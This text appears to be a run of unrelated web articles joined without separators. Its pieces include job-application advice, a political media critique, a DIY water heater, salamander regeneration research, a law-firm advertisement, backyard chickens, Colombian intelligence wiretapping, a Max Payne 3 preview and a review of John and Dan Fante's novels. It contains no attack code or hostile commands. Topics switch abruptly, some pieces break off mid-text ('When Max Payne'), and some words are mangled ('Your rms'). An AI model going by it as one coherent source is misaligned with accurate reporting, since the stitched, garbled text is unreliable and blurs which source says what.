Maybe it just was n't their thing , or they were working two jobs and did n't have time , or they dropped out to start their own company .
If that 's you , then you 'll have to show me how bright you are .
Do you solve really hard problems on a regular basis at work ?
Tell me about it .
Did you apply to MENSA for the fun of it and get in ?
Impressive .
Hold the record for creating the Sunday crossword puzzle with the fewest black squares ?
Awesome .
Exceptional standardized test scores will even do in a pinch ( though that might not be as widely accepted ) .
Selectivity
This is where we get lazy .
See , we figure that if you 've gotten into other selective institutions , then you 're probably a pretty good applicant .
It means you 've been approved by a similar process .
Your rms all you really need here .
Just make sure you have an " Education " section .
Even if you did n't finish college , the fact that you got in can only help .
Hardcore
What I mean by hardcore is that you 've worked with a difficult technology , something that not every Bob , George , and Davie could grasp .
Lower - level technologies are usually hardcore : things like significant experience in assembly , writing a graphics engine in C++ , optimizing JVM load times in C .
New technologies also count as hardcore .
At one point Python and Ruby would have qualified .
Now , Haskell and Erlang make the cut .
( And of course , Lisp is always hardcore . )
Usually the experience section of your rmill cover this .
A small side project or two are n't really enough to count ( though you should still do them ) ; you need several years ' experience .
This can be difficult for recent graduates , but remember , you do n't need every one of these criteria .
Diversity
Now , before I go and get myself in trouble , I want to make it clear that I 'm not talking about the usual definition of diversity that has to do with inherent characteristics of who you are .
What we are looking for here is diveristy of experience .
Software development , at all levels , is about intense problem solving .
Having a team with a diverse background of experience means having a team with more points of view .
Usually , the " Experience " section of your resume will be enough to fulfill this , though sometimes an applicant 's extracurriculars will make a difference .
Just show me that you 're a well - rounded person .
Summary
Remember , you do n't need to hit all seven of these , so do n't try to make things up just to fulfill one area .
Spend time on your strong suits .
Better to meet four really well than stretch the truth to make five .
Of course , not all companies use this particular screening process .
Some may not even look at your cover letter .
But spending the time to carefully craft your application will be well worth the effort either way .
I find that the process of writing my cover letter helps me improve my rmand vice versa .
For the companies that do read cover letters , you 'll have a leg up , and for those that do not , having one certainly wo n't hurt you .
Update :
The second and third articles in the series is up !
NewsHounds :
The headline of the linked article is “ House Passes Milestone Energy , Climate Change Bill . ”
Obviously not happy with the AP headline , the Fox Nation writers , in order to put it in right wing terms the pitchfork gang can understand and appreciate , tweaked it thusly : “ Treason ?
House Passes Direct Assault On Industrial Base . ”
It is accompanied by a photo of House Speaker Nancy Pelosi .
The AP article is what real journalism is all about , as it describes what happened in the House of Representatives with no reference to “ treason . ”
The Fox Nation headline is a subjective statement of pure right wing propaganda by those who have n’t read the constitution and is aimed at those who are constitutionally illiterate .
But then , in Fox Nation , anyone who dares disagree with the solons of right wing dogma are traitors .
Republican Rep Michele Bachman claims that Jesus has taken care of global warming , so why worry ?
BTW , Republican Representative John Shimkus said that " This is the largest assault on democracy and freedom in this country that I have ever experienced . ”
He did n’t accuse the other side of treason .
But it ’s ironic , do n’t ya think , that the same folks who accused those of disagreeing with Bush administration of being traitors , are now those who are disagreeing with the Obama administration to the point of advocating secession .
( via Wugsy ) Update 1/28/06 : Turns out that this DIY water heater was made by Patryk Sielski from Warsaw , Poland .
Patryk wrote : I live in an academic hostel of Warsaw University of Technology .
Unfortunately , we do n't have hot water in our rooms , it 's only in kitchen and toilet outside .
This inconvenience caused me to think about hot water .
Commercial heaters are to expensive to students , it 's also a problem to assemble without temporary cutting off the water .
Beside of that , the fuses would be immediately blown .
The cheapest device that have an electric heater is a cordless kettle .
Some glue , a bottle and a pipe ... voila !
The hot water flows .
By tracking individual cells in genetically modified salamanders , researchers have found an unexpected explanation for their seemingly magical ability to regrow lost limbs .
Rather than having their cellular clocks fully reset and reverting to an embryonic state , cells in the salamanders ' stumps became slightly less mature versions of the cells they 'd been before .
The findings could inspire research into human tissue regeneration .
" The cells do n't have to step as far back as we thought they had to , in order to regenerate a complicated thing like a limb , " said study co-author Elly Tanaka , a Max Planck Institute cell biologist .
" There 's a higher chance that human or mammalian cells can be induced into doing the same thing . "
Thinkers from Aristotle to Voltaire and Charles Darwin have been fascinated by salamander regeneration , though they barely understood it .
( Aristotle even confused salamanders with snakes , attributing to the latter the power of growing new eyes . )
But only in the last few decades have scientists been able to study the phenomenon at high resolution .
They found that salamander regeneration begins when a clump of cells called a blastema forms at the tip of a lost limb .
From the blastema come skin , muscle , bone , blood vessels and neurons , ultimately growing into a limb virtually identical to the old one .
Researchers , many of whom hoped their findings could someday be used to heal people , hypothesized that as cells joined blastemas , they " de - differentiated " and became pluripotent — able to become any type of tissue .
Embryonic stem cells are also pluripotent , as are cells that have been genetically reprogrammed through a process called induced pluripotency .
Such cells have raised hopes of replacing lost or diseased tissue .
They 're also difficult to control and prone to turning cancerous .
These problems may well be the inevitable growing pains of early - stage research , but could also represent more fundamental limits in cellular plasticity .
If Tanaka 's right that blastema cells do n't become pluripotent , then the findings raise another possibility — not just for salamanders , but for people .
Rather than pushing cellular limits , perhaps researchers could work within nature 's parameters .
" People working on stem cells are trying to de- differentiate cells in an artifical fashion , " said Alejandro Sánchez Alvarado , a Howard Hughes Medical Institute stem cell biologist who was not involved in the study .
" It will be very important for the regenerative - medicine community to take stock of what 's going on in the salamander , because they 've been doing it for 360 million years , and found a natural way to de-differentiate their tissues . "
Having first added a gene that makes a fluorescent protein into the genomes of axolotl salamanders , Tanaka 's team removed from their eggs the cells that would eventually become legs .
They fused the cells into new eggs ; when these matured into adult salamanders , cells in their legs glowed under a microscope .
After the researchers amputated their salamanders ' legs , the legs regrew .
Cells in the new legs also contained the fluorescent protein and glowed under a microscope , so the scientists could watch blastemas form and legs regrow in cell - by - cell detail .
Contrary to expectation , skin cells that joined the blastema later divided into skin cells .
Muscle became muscle .
Cartilage became cartilage .
Only cells from just beneath the skin could become more than one cell type .
" People did n't know if the salamanders were special because they forced adult tissues to become pluripotent , and whether we should look for factors that did that — or if , as we find now , we actually should n't try to force cells back to a pluripotent state , " said Tanaka .
Whether this striking absence of pluripotency is universal is still unknown .
The experiment needs to be replicated independently in other salamander species .
Experiments underlying the pluripotency hypothesis " have been reproduced by multiple labs , " said Sánchez Alvarado .
" There 's clearly something to them .
But the results from Elly 's lab seem solid .
There 's clearly a paradox here . "
According to Sánchez Alvarado , those earlier experiments labeled cells with dyes that may have bled into other cells , creating the illusion of pluripotency .
It 's also possible that the axolotl 's mechanisms are different from other salamanders .
If Tanaka 's findings hold , they suggest a relatively new avenue for stem cell research .
Bodies might find it easier to accept cells that have been only partially reprogrammed , like those in the axolotl 's blastema , than embryonic or fully reprogrammed cells .
" The salamanders are dialing the timeline back a few steps , " he said .
" They do n't go all the way back and ask a cell to catch up , " said Sánchez Alvarado .
This approach has shown promise in the lab of Harvard Stem Cell Institute co-director Douglas Melton , who last year used partial reprogramming on pancreas cells that subsequently formed other pancreas cell types .
" This represents a parallel approach for how to make cells in regenerative medicine , " said Melton at the time .
" If you ’ve got extra cells of one type and need another , why go all the way back to a stem cell ? "
Tanaka next hopes to decipher the genetic instructions governing blastema formation .
But however the pluripotency –versus–partial - reprogramming debate turns out , her team 's development of a genetically modified axolotl as a model organism for regenerative research is significant .
" We 've known about this since Aristotelian times , and it 's only now , this week , that a paper gets published telling us what the cellular dynamics are , " said Sánchez Alvarado .
" It 's the really early days .
This is the first of many discoveries . "
See Also :
Citations : " Cells keep a memory of their tissue origin during axolotl limb regeneration . "
By Martin Kragl , Dunja Knapp , Eugen Nacu , Shahryar Khattak , Malcolm Maden , Hans Henning Epperlein & Elly M. Tanaka .
Nature , Vol. 460 No. 7251 , July 1 , 2009 .
" A cellular view of regeneration . " By Alejandro Sánchez Alvarado .
Nature , Vol. 460 No. 7250 , June 25 , 2009 .
Image : D.Knapp/E.Tanaka .
Green nerve cells cluster around a growing nerve in this cross-section of a regenerating limb .
**
Brandon Keim's Twitter stream and reportorial outtakes ; Wired Science on Twitter .
Home Purpose - Built Languages Mike Shapiro , Purpose - Built Languages , ACM Queue vol. 7 , no. 1 , February 2009 .
Mike Shapiro from Sun Microsystems examines the evolution of what he calls " purpose - built languages " ( essentially domain - specific languages ) .
Shapiro discusses the way that such languages have often been a key part of the development of larger software systems , and describes how many of them have sprung into existence and evolved without formal design .
In particular , he traces the evolution of the adb debugger language .
As Shapiro says :
The debugger tale illustrates that a little purpose - built language can evolve essentially at random , have no clear design , no consistent grammar or parser , and no name , and yet endure and grow in shipping operating systems for more than 40 years .
In the same time period , many mainstream languages came and went into the great beyond ...
For purpose - built languages , a deep connection to a task and the user community for that task is often worth more than clever design or elegant syntax .
The same article also appeared in the April 2009 issue of Communications of the ACM .
Comment viewing options
Flat list - collapsed Flat list - expanded Threaded list - collapsed Threaded list - expanded Date - newest first Date - oldest first Select your preferred way to display the comments and click " Save settings " to activate your changes .
POLICE say a tow truck driver was texting on one mobile phone while talking on another when he slammed into a car and crashed into a swimming pool .
Niagara County sheriff 's deputies say 25 - year - old Nicholas Sparks admitted he was texting and talking when his flatbed truck hit the car on Wednesday morning in Lockport , which is outside Buffalo .
The truck then crashed through a fence and sideswiped a house before rolling into an in - ground pool .
Police say the 68 - year - old woman driving the car suffered head injuries and was in good condition .
Her 8 - year - old niece suffered minor injuries .
Sparks was charged with reckless driving , talking on a cell phone and following too closely .
Waukegan Car Accident Lawyers Putting the Law on Your Side
At Salvi & Maher , L.L.C. , we are committed to providing every client with our best efforts , and we will give you our personal attention , answering your questions and helping you understand the justice system .
With over 85 years of combined experience and a history of obtaining multi-million dollar results for our clients , we can provide you with the representation you need in your personal injury case .
As you and your family recover from a serious injury or adapt to a permanently changed lifestyle , the Illinois insurance Attorneys you must work with are nurturing their own interest : minimizing their business 's financial exposure .
These companies have extensive resources and highly trained lawyers on their side .
To protect your interests , it is often necessary to hire someone who can put that same level of ability and experience behind your case .
Our Lake County personal injury attorneys are proud to offer respected and proven representation for clients who need a strong , dependable partner .
We handle a wide range of personal injury cases by providing :
Experienced personal injury attorneys who understand your case .
who understand your case .
Unwavering commitment to client service .
to client service .
Friendly and compassionate advice to our customers .
to our customers .
Proven success spanning decades in and out of the courtroom .
spanning decades in and out of the courtroom .
Free initial consultations to find out more about your case and our lawyers .
Working throughout the region and across Illinois , we strive to meet the needs of the seriously injured .
Whether you or a family member was hurt on the highway in a car or truck accident , at work in a construction accident , or in your neighborhood by an aggressive dog , we will fight for fair compensation and justice for you .
Lawyers with Offices in Waukegan , Wheaton , Richmond , and Chicago
Our law firm is built on the foundation of helping people who have suffered needlessly .
If you have been injured and need to make sure your family will have full and fair access to compensation , do not hesitate to call our office at 847-662-3303 and set up your free initial consultation .
You can also reach us online to request more information or set up an appointment .
At Salvi & Maher , L.L.C. , our Lake County personal injury attorneys only collect our fees when you collect compensation .
So : with the announcement that Jon Gosselin is considering having his own solo gig , I asked our commenters this morning what we should name it .
They responded .
We have nominees , and a winner .
TV Producers : listen close .
We got some pretty great ones , and some pretty terrible ones .
Almost all of them were scored by me , and you can check the scores in the original thread if you 'd like .
I promised our winner a star , and a star they shall get ( in the event our winner was already starred , well , they just get glory , and something like :) from us ) .
First , in no particular order , a sampling of the runners - up :
From RoyJagabat : " NYC Drek . "
From Labyrinthine : " Jon and Ed Hardy Sitting in a Tree Minus Kate Plus Some Stupid Twenty - somethings . "
From Maya Twocents : " Prison Break : Jon Gosselin Edition . "
From La Tortue : " Eight is Enough ( 2.0 ) . "
From Claire Buoyant : " Kate Spayed . "
From MollyBloomberg : " The Kate Escape . "
From Alexa Elizabeth Ann : " Freedumb ! "
From Homovegetarian : " Douche ! Rinse ! Repeat ! "
And from Section 426 : Jon Gosselin : Ace of Flakes
And finally , our winner , from aLostLady : How Jon Got His Deplorable , Falsely - Achieved , Over - Played Groove Back .
Heh .
Not exactly catchy , kind of awkward , but fairly accurate and a show I 'd probably watch ... uh , if only for Richard 's recaps .
Job well done .
People : set those DVRs .
Aurora
Green pets
ONE day Judith Haller was watching television and saw that Martha Stewart had chickens .
“ I was very envious that she had her own chicken manure , ” she recalls .
So last year , she got a couple of chickens on behalf of her vegetable garden .
They proved to be industrious providers and pleasant companions .
Now there are 13 hens pecking around the yard .
And Ms Haller has become an advocate for a hot movement : backyard chickens .
In April , as part of Austin 's first Funky Chicken Coop Tour , she hosted 637 visitors .
Chickens are having a moment .
For Americans who are concerned about eating locally or organically , hens can help .
They produce fresh , free - range eggs .
They eat table scraps , and their waste goes in the compost pile .
Finances are a factor for some families .
Mimi Bernhardt says that she and her partner became more reflective about sustainability when the economy worsened .
Now they are growing melons , tomatoes , onions and aubergines , and they raise ducks as well as chickens .
Their grocery bill has plummeted .
There is also a pet aspect .
Hens are soft and fluffy , if not very affectionate .
As Ms Haller puts it , they make cats seem like dogs .
It is impossible to know exactly how many Americans have joined this trend .
The Department of Agriculture does not track hobbyists .
Owners can register via the National Animal Identification System , but it is strictly voluntary .
This is a sore point with some health experts , who say that America needs a better way to keep track of its animals .
In any case , signs point to a bird surge .
Hatcheries that deliver chicks by mail have reported backlogs .
Rob Ludlow , the owner of BackyardChickens.com , says that his forum has 35,000 members and about 100 more joining each day .
Backyard poultry groups meet in at least two dozen cities , from Seattle in Washington to Tallahassee in Florida .
Over the past few years many cities have , in response to public pressure , relaxed ordinances against the birds .
Andy Schneider , a radio host known as the Chicken Whisperer , says he gets calls every day from people who are interested in challenging their city council on this score .
Web sites like Craigslist , Facebook and Twitter help them organise .
“ If you have 50 people wearing buttons saying ‘ I love chickens ' on the steps of the courthouse , it does make a statement , ” he says .
When the editorial staff of Semana , a feisty Bogotá - based weekly news magazine , was closing out their Feb. 21 edition , they could n’t help but notice an unmarked car parked for several hours in front of their building .
This came as no surprise to editor - in - chief Alfonso Cuéllar , who supervised a six - month long investigation of illegal wiretapping by Colombia ’s domestic intelligence agency , the Administrative Department of Security , known in Colombia as the DAS .
“ We knew that both the good guys and the bad guys were aware that we were working on the story , ” said Cuéllar in a recent interview from Bogotá .
“ That ’s partly why the DAS was shredding all of the evidence a month before it broke . ”
Backed up by numerous sources and documents , Semana exposed how members of the DAS were illegally spying on Supreme Court judges , former Colombian president César Gaviria , opposition politicians , prominent journalists and even high - ranking members of the ruling party .
Amongst a roster of Machiavellian allegations — from KGB - like tactics used to create “ vice files ” on prominent politicians , to the selling of sensitive intelligence to narco traffickers and those with links to illegal paramilitary organizations and the National Liberation Army ( ELN ) guerillas — is one charge that will be of particular interest to the United States , especially as the country contemplates the fallout from its own domestic surveillance scandal .
The U.S. government , according to the Semana report , supplied the sophisticated interception devices used by the spies in Colombia .
NOT EVERYBODY IS SO AGNOSTIC
“ It will be interesting to see if the rumors that are circulating in Bogotá , that the U.S. Embassy had a role in the wiretapping operation , turn out to be true , ” said Joseph Fitsanakis , senior editor of IntelNews and a longtime intelligence analyst .
“ It wo n’t be the first time . ”
According to sources in Bogotá , the DAS used a system called Phantom 3000 , marketed by a company called TraceSpan Communications , a private U.S. company with a development center in Israel .
“ In this age of high security threats , when foreign terrorists and local criminals use the Internet for communication , TraceSpan is proud to provide Law Enforcement Authorities a new means to fight back , ” said Hanan Herzberg , TraceSpan founder and CEO , in a press release for the product .
“ The system ’s small footprint makes it an ideal solution for any law enforcement agency as well as the perfect solution for the Central Office . ”
This would n’t be the first time that U.S. - supplied intelligence gear was used by the Colombian government .
In 2006 , the U.S. State Department awarded a $ 5 million contract to California - based Oakley Networks to provide “ Internet surveillance software ” to a specialized unit of Colombia ’s National Police .
The details of that deal emerged when the National Police were accused of spying on a variety of Colombian human - rights groups , as well as U.S. - based interfaith organization , Fellowship of Reconciliation .
Oakley Networks , now a subsidiary of the U.S. defense contractor Raytheon Co. , bills itself as a “ leader in insider threat monitoring and investigations , ” that offers “ sophisticated monitoring and discovery technologies . ”
The Oakley Networks contract came as part of the more than $ 5 billion the United States has sent to Colombia since 2000 to fund Plan Colombia , ostensibly an effort to eradicate production of the coca leaf .
The funding has continued despite the Colombian military ’s ties to right - wing paramilitary groups and to the killing of union leaders , human rights activists and indigenous people .
U.S. REMAINS A KEY FRIEND
In Bogotá , the ramifications of the Semana investigation were immediate .
The offices of the DAS were raided by the Colombian prosecutor general ’s office , the day following Semana ’s original story , and the agency ’s director general , Capt .
Jorge Alberto Lagos , resigned the following week .
The entire high command of the agency submitted letters of resignation and Colombia ’s attorney general recently declared that 22 DAS detectives had been fired and would face “ judicial and administrative investigations , ” while also intimating that more dismissals are coming down the pike .
Colombian President Álvaro Uribe , for years the Bush administration ’s staunchest ally in Latin America , quickly denied any role in the imbroglio and declared that wiretapping would be immediately reassigned to the National Police .
As this was the third such scandal in the DAS under Uribe ’s watch , not everybody is taking the denial at face value .
The scandal broke just four months after the former head of the DAS resigned after admitting it spied on a prominent leftist politician who had exposed ties between Uribe and rightwing death squads .
“ I do n’t think it ’s a very plausible argument that these were just low - level characters in the DAS , who were setting up these illegal wiretaps on their own initiative , ” said Lorenzo Morales , online editor at Semana .
“ The DAS receives its orders directly from the [ Colombian ] president and his inner circle . ”
The spy scandal does not appear to have dampened U.S. - Colombian relations .
Semana broke the story just before Colombia sent a highlevel delegation to meet with Obama administration officials .
On Feb. 25 , U.S. Secretary of State Hillary Clinton welcomed Colombian Foreign Minister Jaime Bermúdez Merizalde by saying , “ It ’s a real pleasure to have the representative of a country that has made so many strides and so much progress , and we have a lot to talk about because there is so much we have in common to work on . ”
Less than two months later , at the Summit of the Americas , President Barack Obama sat next to Uribe and discussed the possibility of a U.S. - Colombian “ free trade ” agreement — a deal Obama opposed on the campaign trail .
In Bogotá , U.S. embassy officials have not denied playing a role in the Colombian spy operation .
“ We have worked with the Administrative Department of Security ( DAS ) in joint and regional counter - narcotics efforts in a positive and straightforward manner , including providing equipment , ” states a diplomatic official at the embassy .
“ We have no knowledge that any equipment has been misused . ”
Semana ’s Alfonso Cuéllar says he hopes the paper ’s report will put an end to illegal spying .
“ I think that one thing we found in our investigation , at least amongst the DAS officials , was that some of these guys do n’t think there ’s anything wrong with this , they think it ’s normal , ” he said .
“ They say , what ’s wrong with checking out people that could be potential enemies of the state , or adversaries of the president ?
Hopefully , one of the things these revelations will get people thinking about is that no , this is not normal . ”
Joseph Huff - Hannon is an independent journalist based in Brooklyn who writes on politics and culture .
A coalition of U.S. organizations have called on the U.S. embassy in Bogotá to pressure Colombian officials to stop spying on human rights and peace organizations .
Between 2006 and 2008 , Colombian agencies reportedly intercepted more than 150 email accounts of groups including the Fellowship of Reconciliation , the oldest interfaith peace organization in the United States .
“ [ This ] puts at risk our field team and the communities we work with , by suggesting that those working for peace and human rights are subversive , legitimate targets for right - wing violence , ” said John Lindsay - Poland , co-director of the Fellowship ’s Task Force on Latin America .
The spy operation began after the U.S. State Department awarded a $ 5 million contract to the California - based Oakley Networks to provide “ internet surveillance software ” to the intelligence unit of the Colombian National Police as part of Plan Colombia .
“ U.S. taxpayers were apparently paying for Colombian agencies to spy on legitimate U.S. and Colombian humanitarian organizations , ” wrote the authors of a December 2008 letter to U.S. Ambassador William Brownfield in Bogotá .
In addition , the Fellowship of Reconciliation fears a June 2007 break - in at the organization ’s Bogotá office was connected to the surveillance campaign .
“ We ’ve also now learned that the Colombian military paid for computer hard drives of interest to intelligence ’ agencies …
These stolen laptops contained sensitive files on our work with members of Colombian peace communities , ” Lindsay - Poland said .
— MIKE BURKE
They sold us a myth and we believed it , so let ’s not make the same mistake again ( Image : Rex Features )
MY STORY starts with a theory that Ronald Reagan and Margaret Thatcher sold us .
It is called “ supply - side economics ” , and it claims that economic growth depends , first , on the rich ( not the poor ) being rewarded with tax cuts ; and second , on markets being freed from regulation .
Clearly the theory is flawed .
The rush by bankers to pay themselves large bonuses , even as their failing banks were being nationalised , reveals the true function of this bloated remuneration – to benefit only …
Thousands of Palestinian children turned out for the record bid
Enlarge Image
Palestinian children turned out in big numbers on a beach in the northern Gaza Strip in an attempt to break the world record for kite flying .
More than 6,000 children gathered to fly more than 3,000 kites , according to the United Nations , which organised it .
The previous record was set in Germany last year - when the Guinness Book of World Records says 967 kites took to the sky simultaneously .
Guinness says it has received an application from Gaza for inclusion .
The organisation did not send a judge to Gaza .
But Karolina
Thelin , a spokeswoman , said there were other ways of verifying the feat .
The UN agency UNRWA says the Gaza children smashed the existing record , and a final tally of the number of kites flown will be released on Saturday .
A UN spokesman said : " The symbolism of thousands of children , in one of the world 's most locked - up communities , creating beautiful kites , letting them soar upward , is truly beautiful . "
... there will be times when all the things she said , will fill your head , you wo n't forget her .
Astronomy Picture of the Day Discover the cosmos !
Each day a different image or photograph of our fascinating universe is featured , along with a brief explanation written by a professional astronomer .
2009 July 2
Explanation : Dubbed a Lyman - alpha blob , an enormous cloud of hydrogen gas spans several hundred thousand light - years in this remarkable image ( left ) , a composite of x-ray , optical , and infrared data from space and ground based observatories .
The gigantic , amoeba - like structure is seen as it was when the universe was a mere 2 billion years old ( about 12 billion years ago ) .
Lyman - alpha blobs are so called because they strongly emit radiation due to the Lyman - alpha emission line of hydrogen gas .
Normally , Lyman - alpha emission is in the ultraviolet part of the spectrum , but Lyman - apha blobs are so distant , their light is redshifted to ( longer ) optical wavelengths .
X - ray data ( blue ) indicates the presence of a supermassive black hole feeding at the center of an active galaxy embedded in the blob .
Illustrated close up in the right hand panel , radiation and outflows from the active galaxy are thought to be a source for energizing and heating the blob 's hydrogen gas .
In fact , Lyman - alpha blobs could represent an early phase in galaxy formation where the heating is so great it begins to limit further rapid growth of active galaxies and their supermassive black holes .
When Max Payne
In addition to the different setting , Max has undergone quite a few physical changes .
He 's burlier this time around , sports a beard and a shaved head , and appears to have ditched the long coat and black getup from the previous games in favor of a stained white sleeveless shirt and cargo pants .
Screens included in the article also show a much brighter setting , making it appear like many of the venues for action in the third game take place while the sun is out .
Rockstar did mention a few levels could take place at night or in the rain , and pointed out that achieving a ' noir ' kind of feel is more about style than about a specific location or color .
Rockstar wo n't be using voice actor James McCaffrey again , saying it would n't really fit considering how much Max has aged .
The talent being used wo n't be a big recognizable name , but Rockstar is confident it 'll be appropriate , and the studio plans on giving Max plenty of lines of internal dialogue in the style of the previous games .
Many details of the new plot are n't yet being talked about , but Rockstar told Game Informer players can expect it to include the elements of betrayal and violence the series is known for .
To build the new setting , Rockstar sent crews down to Sao Paulo to take note of environmental layouts and soak in the local flavor .
The company believes it 'll be able to put together some interesting locations for shootouts , with enemies being able to pop out of all sorts of unexpected spots as Max moves through the streets of shanty towns .
This third game is being handled by Rockstar Vancouver instead of Remedy , the developer of the original games currently busy with Alan Wake .
One of the big questions Rockstar Vancouver is trying to answer with this game is how to evolve the third - person shooting mechanics of the franchise to make them feel new again .
With the first two , the bullet time system that let Max slow down those around him while performing dives and dodges and blasting bullets was unique enough to stand out .
The third game will still feature a bullet time system , but will also include a number of other features that have to do with animation and interaction with the environment to ensure the gameplay feels distinct .
The game is being built with Rockstar 's RAGE , used to build past games like Grand Theft Auto IV , in combination with NaturalMotion 's Euphoria technology that allows for enemies to react realistically to being hit by gunfire and as they impact things in the environment , which Rockstar is hoping delivers a greater sense of realism .
To protect himself from incoming bullets , Max will also be able to take cover behind objects as well as grab enemies to use them as human shields , though taking advantage of the cover system is n't required for success .
It seems quite a few bits of the environment will also be destructible , so perhaps not every bit of cover will be all that reliable .
Something called environmental bullet time is being built into the game , which according to the article can be compared to quick - time events in other titles .
Yet instead of doing something like tapping a button within a small window of time , the player will have full control of Max as the event progresses .
Rockstar provided one example to Game Informer , where Max slides down a tin roof in slow motion while tagging nearby enemies with bullets .
This wo n't be an open - world game , though it seems
Max will have a limited ability to scale walls and access combat areas from a few different directions .
A bullet - cam , which follows projectiles into their targets , will be implemented into the game to add more style , and it seems Max will be able to perform life - saving kill shots should he be near death .
If he manages to kill his killer before the screen goes black , he 'll spring back to life thanks to an adrenaline boost .
What Game Informer seemed most impressed by were the animations and attention to detail in the environments , which were said to enhance the gunplay and feel of the game .
While hardly anything was said about the multiplayer , it was confirmed that there will be an online component in the PlayStation 3 , Xbox 360 , and PC version of the game .
Certain books are better discovered than sold .
On a lonely library
shelf , say .
Or better yet , pressed into one ’s hands by the one clerk at
Borders who actually reads .
Or , ultimately , recommended by another
writer through the power of literary broadcast .
Charles Bukowski pushed
a few books into the hands of a generation when he told “ a little
butterball … in heat ” who his favorite author was :
“ Fante . ”
“ Who ? ”
“ John F - A - N - T - E . Ask the Dust .
Wait Until Spring , Bandini . ”
Those lines are from Women , and that was 30 years ago .
Fante ,
already forgotten , had his career resuscitated when Black Sparrow Press
publisher John Martin asked Bukowski if Fante were real and then
brought the writer ’s work back into print .
He even inspired Fante ,
blind and diabetic by that time , to dictate one last novel to his wife ,
Joyce .
Now it is 2009 and the centenary of John Fante ’s birth .
He is
dead .
Bukowski is dead .
Fante ’s son , Dan — a cult fiction writer in his
own right who spent years in obscurity , published only overseas or by
small presses — now has five books coming out this year , four with
Harper Perennial .
Harper is also releasing an anniversary edition of
John Fante ’s Ask the Dust .
But when books are better discovered
than sold , as is the case for the work of both Fantes , are they ready
for the spotlight that only Big Publishing can provide ?
Ask the Dust by John Fante. Ecco. 192 pages .
$ 16.99 ( rerelease ) .
86’d by Dan Fante .
Harper Perennial . 272 pages .
$ 13.99 ( September 2009 ) .
Chump Change by Dan Fante . Harper Perennial. 304 pages ( rerelease ) .
Mooch by Dan Fante . Harper Perennial. 304 pages ( rerelease ) .
Spitting off Tall Buildings by Dan Fante . Harper Perennial. 304 pages ( rerelease ) .
In Women , Bukowski sums up Fante ’s appeal in just a few words : “ Total emotion .
A very brave man . ”
It ’s true .
Most of Fante ’s books are at least semi-autobiographical in that they deal with the lives and frustrations of Italian - American men ( or boys ) who want to be writers .
Father is often a stonemason , a God with feet of chipped concrete .
In several of the books , alter ego Arturo Bandini is Fante .
He ’s a romantic figure , struggling to escape the shadow of his father , with his dark features and foreign surname in an era when Italians were just barely white , and to just get something down on paper .
He thrashes about , and every setback is agony .
Two snippets of Arturo ’s views on Los Angeles , the city that both saved and ruined Fante ’s life :
“ Los Angeles , give me some of you !
Los Angeles come to me the way I came to you , my feet over your streets , you pretty town I loved you so much , you sad flower in the sand , you pretty town ! ”
“ So fuck you , Los Angeles , fuck your palm trees , and your highassed women , and your fancy streets , for I am going home , back to Colorado , back to the best damned town in the U.S.A. — Boulder , Colorado . ”
Fante ’s writing in general — and Ask the Dust in particular — is the sort of work an enterprising if desperate young literary man would gobble up .
He might even give out copies to friends ( if he had any ) and especially to women he found attractive ( plenty of those around ) .
Heck , I ’ve done it .
Maybe it used to work .
The most recent response I ’ve had from a woman to whom I sent a copy was , “ So , in the 1930s did readers realize that this guy is a jerk ?
Is he supposed to be annoying ? ”
Another sniffed , “ He reminds me of the boys I went to college with . ”
And it ’s not like anyone is lining up outside bookstores to get a peek into the fevered minds of college boys these days , not even ones who can write like a dream and wish they were Caucasian enough to make it big .
Fante grew up , of course , and in a way he even made it .
The dream of being a great novelist died on the vine , but Fante scored big as a hack screenwriter .
Dreams from Bunker Hill , his last novel , deals with Arturo ’s early days at a Hollywood studio — “ I smoked a Meerschaum pipe and became a writer once more in the world ” Arturo recalls — and two of his novels deal with life in middle - class adulthood and death .
Full of Life is n’t about Bandini but about John Fante himself .
The dream of writing has been replaced with the quiet hell of screenwriting in the studio system for big bucks .
“ First book sold 2,300 copies .
Second book sold 4,800 copies .
Third book sold 2,100 copies .
But they do n’t ask for royalty statements in the picture business , ” the author / narrator tells us .
And in the book , Joyce is full of life — she ’s pregnant .
At one point John listens to her belly and thinks he hears a monster .
Then Papa shows up , ready to fix up the young family ’s termite - infested house .
It ’s a cute book , though of course Fante is a jerk in it .
It was made into a film with Judy Holliday , but the movie is not available on DVD .
But even Papa does n’t last forever .
In The Brotherhood of the Grape the old stonemason has one last job :
He has to make good on a rubber check he tried to pass during a drunken poker game — and has burned through all his old friends and cronies save for his middle - aged son .
But years in Hollywood have made the grown - up kid soft .
Fante ’s stand - in can do nothing to extricate his father from this fatal job .
He ca n’t break rocks like his old man , and he ca n’t out - think the cagey old Italian motel owner who , in his own way , was letting Papa die with a little dignity by letting him work off a debt rather than beg it off .
In the end , the successful screenwriter can only wail , “ I was scum again , proletarian scum , the son of an ill - fated mason who had struggled all his life for a bit of space on earth .
Like father , like son .
Ah , Dostoyevsky !
Fyodor could have come walking out of the fog and placed his hand on my shoulder and it would have meant nothing .
How could a man live without his father ?
How could he wake up in the morning and say to himself :
My father is gone forever ? ”
Then there ’s Dan Fante , whose novels feature Bruno Dante , the son of a screenwriter who published a few novels but has been forgotten .
In the Dante series , Dan Fante owes as much to Bukowski and Selby as he does to his father .
Forget the braggadocio and solipsism of Arturo Bandini — Bruno Dante is out of control with weeklong wine binges that lead to porn theaters and anonymous homosexuals sucking away from between his legs .
In Chump Change , Bruno spends 200 pages with his dead father ’s dying dog , feeding the beast booze and junk food , the pair of them living out of a station wagon and rolling through the low life of Los Angeles .
Short Dog is a collection of stories that share two themes : driving a cab and alcoholism .
Bruno wants to be a writer , too .
He ’s written some poems .
He writes stories and then tears them up in fits of self - loathing and anguish .
Writing runs through Dan ’s novels and stories just as it does through John ’s , but booze and abuse are the real compulsions of the junior Dante ’s work .
In the era of Ask the Dust and The Brotherhood of the Grape , great literature was the secret password to a new way of living .
In Spitting off Tall Buildings and Chump Change , the cheapest wines are .
Bruno finds himself in dead - end job after tedious dead - end job : cabbie , boiler room phone jockey , window washer ; the sweet relief comes only when a co-worker flashes a flask , or when a sales lead ends up being a horny , wealthy , older woman whose eyeballs are floating in booze .
Bandini freaked out when his great love , Camilla , smoked some marijuana ; Dante hangs out with underage whores for 50 pages at a time .
The Fantes are a bit of an acquired taste , at least in a post - literate era in which authors need platforms — photogenic survivors of cancer , or those suffering the endless horrors of gluten — and Oprah ’s approval , and in which nobody is allowed to be a jerk unless he is finally defeated with an Expelliarmus spell after seven increasingly lengthy novels filled with ancillary product branding opportunities and multi-license franchise potential ( sorry to spoil Harry Potter for those who have n’t read the books ) .
